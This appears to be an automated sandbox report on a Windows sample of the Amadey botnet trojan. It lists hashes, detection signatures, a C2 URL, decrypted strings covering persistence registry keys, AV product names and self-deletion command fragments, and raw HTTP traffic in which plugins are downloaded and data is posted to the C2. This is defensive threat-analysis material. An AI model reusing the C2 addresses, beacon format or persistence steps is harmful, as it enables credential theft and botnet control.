Windows Analysis Report
fE7X8Fp2WG.exe

Overview

General Information

Sample name: fE7X8Fp2WG.exe
renamed because original name is a hash value
Original sample name: cb2487ebc8a23756a66be03075e5b70d.exe
Analysis ID: 1427171
MD5: cb2487ebc8a23756a66be03075e5b70d
SHA1: 546d98369d3b08424a26558b9386e622803a2df9
SHA256: 6e1d2a58743dd5b05b0654ae4067d77f7580ba07fe034cd7b068f4a084d9fdcd
Tags: 32Amadeyexetrojan
Infos:

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadey
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: fE7X8Fp2WG.exe Avira: detected
Found malware configuration
Source: 31.2.Dctooux.exe.400000.0.raw.unpack Malware Configuration Extractor: Amadey {"C2 url": "topgamecheats.dev/j4Fvskd3/index.php", "Version": "4.18"}
Multi AV Scanner detection for domain / URL
Source: topgamecheats.dev Virustotal: Detection: 23% Perma Link
Source: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll Virustotal: Detection: 22% Perma Link
Source: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll123456789 Virustotal: Detection: 11% Perma Link
Source: http://topgamecheats.dev/j4Fvskd3/index.php Virustotal: Detection: 23% Perma Link
Source: http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dll123456789 Virustotal: Detection: 21% Perma Link
Source: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1 Virustotal: Detection: 21% Perma Link
Source: http://topgamecheats.dev/j4Fvskd3/index.php% Virustotal: Detection: 21% Perma Link
Source: topgamecheats.dev/j4Fvskd3/index.php Virustotal: Detection: 23% Perma Link
Source: http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dll Virustotal: Detection: 11% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Virustotal: Detection: 49% Perma Link
Multi AV Scanner detection for submitted file
Source: fE7X8Fp2WG.exe ReversingLabs: Detection: 47%
Source: fE7X8Fp2WG.exe Virustotal: Detection: 49% Perma Link
Machine Learning detection for sample
Source: fE7X8Fp2WG.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: topgamecheats.dev
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: /j4Fvskd3/index.php
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: S-%lu-
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: 154561dcbf
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Dctooux.exe
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Startup
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: cmd /C RMDIR /s/q
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: rundll32
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Programs
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: %USERPROFILE%
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: cred.dll|clip.dll|
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: http://
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: https://
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: /Plugins/
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: &unit=
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: shell32.dll
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: kernel32.dll
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: GetNativeSystemInfo
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ProgramData\
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: AVAST Software
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Kaspersky Lab
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Panda Security
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Doctor Web
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: 360TotalSecurity
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Bitdefender
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Norton
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Sophos
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Comodo
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: WinDefender
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: 0123456789
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ------
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ?scr=1
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ComputerName
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: -unicode-
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: VideoID
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: DefaultSettings.XResolution
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: DefaultSettings.YResolution
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ProductName
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: CurrentBuild
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: rundll32.exe
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: "taskkill /f /im "
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: " && timeout 1 && del
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: && Exit"
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: " && ren
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Powershell.exe
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: -executionpolicy remotesigned -File "
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: shutdown -s -t 0
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: random
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: rundll32
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: https://
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: && Exit"
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Startup
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: -unicode-
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Norton
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ?scr=1
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ------
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Sophos
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: random
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: " && ren
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: /Plugins/
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: &unit=
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: VideoID
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Comodo
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: S-%lu-
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Programs
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: http://
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ~L$v(g
Source: 31.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ~L$v(g

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Unpacked PE file: 0.2.fE7X8Fp2WG.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Unpacked PE file: 22.2.Dctooux.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Unpacked PE file: 31.2.Dctooux.exe.400000.0.unpack
Uses 32bit PE files
Source: fE7X8Fp2WG.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Binary string: C:\vetejuso.pdb source: fE7X8Fp2WG.exe, Dctooux.exe.0.dr
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Dctooux.exe_797badcf6563115bb57cdaf452d66c733e0e4_312956d7_e0bdaaf8-20b7-4ad5-a3f8-3137a7face24\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fE7X8Fp2WG.exe_777bac5a67f8742582a3f98a2f166c5f7aec29a_5b55d45e_3e4375e7-26f8-4e5e-89dc-2ae36a285385\

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: topgamecheats.dev/j4Fvskd3/index.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Mon, 11 Mar 2024 21:14:27 GMTetag: "65ef7433-139e00"accept-ranges: bytescontent-length: 1285632date: Wed, 17 Apr 2024 05:17:15 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 b3 5a e9 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Mon, 11 Mar 2024 21:14:32 GMTetag: "65ef7438-1b600"accept-ranges: bytescontent-length: 112128date: Wed, 17 Apr 2024 05:17:31 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b5 5a e9 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /j4Fvskd3/Plugins/cred64.dll HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYwMTk=Host: topgamecheats.devContent-Length: 86171Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYwMTk=Host: topgamecheats.devContent-Length: 86171Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYwMTk=Host: topgamecheats.devContent-Length: 86171Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYwMTk=Host: topgamecheats.devContent-Length: 86171Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYwMTk=Host: topgamecheats.devContent-Length: 86171Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 46 33 32 37 44 34 37 35 34 36 37 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 39 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874F327D475467365FFF962A9E3C6DED93116A534FFD01283FD525849FE309
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYwMTk=Host: topgamecheats.devContent-Length: 86171Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /j4Fvskd3/Plugins/clip64.dll HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
